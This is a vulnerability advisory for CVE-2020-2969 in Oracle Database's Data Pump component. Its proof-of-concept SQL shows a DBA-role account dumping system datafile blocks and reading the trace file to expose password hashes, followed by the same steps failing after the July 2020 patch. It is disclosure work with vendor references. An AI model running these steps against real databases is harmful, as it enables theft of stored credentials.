Oracle Database Password Hash Unauthorized Access

`Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role  
Product: Database  
Manufacturer: Oracle  
Affected Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c  
Tested Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c  
Risk Level: Medium  
Solution Status: Fixed  
CVE Reference: CVE-2020-2969  
Base Score: 6.6   
Author of Advisory: Emad Al-Mousa  
  
  
*****************************************  
Vulnerability Details:  
  
Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.  
  
The presented scenarios illustrates that an account with “DBA” role can still view/extract the password hashes although the account can’t directly query SYS.USER$ table as a security enhancement since “select any dictionary” system privilege doesn’t provide access to SYS.USER$ anymore  
  
*****************************************  
Proof of Concept (PoC):  
  
This simulation was performed in Oracle Non-CDB environment, and is applicable of course in CDB setup also.  
  
SQL> create user ninja identified by hello_123;  
  
  
SQL> grant create session to ninja;  
  
  
SQL> grant dba to ninja;  
  
  
SQL> alter user ninja default role all;  
  
  
*** when attempting to select from SYS.USER$ the account will not be able since the system privilege “SELECT ANY DICTIONARY” is changed by restricting direct access to multiple SYS tables such as USER$, ENC$,DEFAULT_PWD$, LINK$, USER_HISTORY$, CDB_LOCAL_ADMINAUTH$  
  
SQL> select * from sys.user$;  
select * from sys.user$  
*  
ERROR at line 1:  
ORA-01031: insufficient privileges  
  
** I will perform dump to the system data file to gain access to the hashed passwords  
  
SQL> alter system dump datafile 1 block min 210 block max 215;  
  
** Then immediately I will check the generated trace file name using the query:  
  
SQL> select * from v$diag_info where NAME='Default Trace File';  
  
** I will query the “payload” column of the view V$DIAG_TRACE_FILE that will read the generated trace file contents:  
  
SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_6029.trc';  
  
// the password hash will be exposed in the trace file !  
  
After applying Oracle July 2020 CPU patches- try to re-simulate again:  
  
SQL> create user ninja identified by hello_123;  
  
  
SQL> grant create session to ninja;  
  
  
SQL> grant dba to ninja;  
  
  
SQL> alter user ninja default role all;  
  
  
SQL> show user  
USER is "NINJA"  
  
SQL> select * from sys.user$;  
select * from sys.user$  
*  
ERROR at line 1:  
ORA-01031: insufficient privileges  
  
  
SQL> alter system dump datafile 1 block min 210 block max 215;  
alter system dump datafile 1 block min 210 block max 215  
*  
ERROR at line 1:  
ORA-01031: insufficient privileges  
  
SQL> select * from v$diag_info where NAME='Default Trace File';  
  
INST_ID NAME  
---------- ----------------------------------------------------------------  
VALUE  
--------------------------------------------------------------------------------  
CON_ID  
----------  
1 Default Trace File  
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171  
16.trc  
  
  
SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ora5_ora_117116.trc';  
  
PAYLOAD  
--------------------------------------------------------------------------------  
Trace file   
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171  
16.trc  
  
Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production  
Version 19.8.0.0.0  
Build label: RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702  
ORACLE_HOME: /oraclex/oradbp05/product/19.3  
System name: Linux  
Node name: boba  
Release: 3.10.0-1127.13.1.el7.x86_64  
Version: #1 SMP Fri Jun 12 14:34:17 EDT 2020  
  
PAYLOAD  
--------------------------------------------------------------------------------  
Machine: x86_64  
Instance name: ora5  
Redo thread mounted by this instance: 1  
Oracle process number: 69  
Unix process pid: 117116, image: oracle@boba (TNS V1-V3)  
  
  
*** 2020-07-16T11:09:31.240875+03:00  
  
*** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00  
*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00  
  
PAYLOAD  
--------------------------------------------------------------------------------  
*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00  
*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00  
*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00  
*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00  
  
Error: file 1 can only be dumped with SYSDBA privillege  
  
  
  
*****************************************  
References:  
https://www.oracle.com/security-alerts/cpujul2020.html  
https://www.oracle.com/security-alerts/cpujul2020verbose.html  
https://nvd.nist.gov/vuln/detail/CVE-2020-2969  
https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/  
  
  
  
`